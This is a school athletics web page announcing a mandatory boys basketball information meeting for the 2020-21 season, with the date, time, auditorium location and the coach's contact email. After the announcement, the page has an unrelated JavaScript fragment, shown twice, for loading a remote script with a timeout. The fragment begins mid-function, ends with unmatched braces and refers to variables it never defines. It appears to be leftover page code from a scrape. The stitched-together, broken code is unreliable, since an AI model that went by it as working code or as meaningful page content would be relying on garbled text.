Boys Basketball
Mark Your Calendars: Boys Basketball Information Meeting on Wednesday, October 7th!
There will be a mandatory meeting for all boys planning to play basketball for the Firebirds in the 2020-21 season. All athletes must have at least 1 parent or guardian with them for the informational meeting on Wednesday, October 7th. Coach Leon and his staff will meet in the Auditorium at 6:30 p.m. at Lakota West High School. For any additional questions please email coach Leon at jim.leon@lakotaonline.com
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();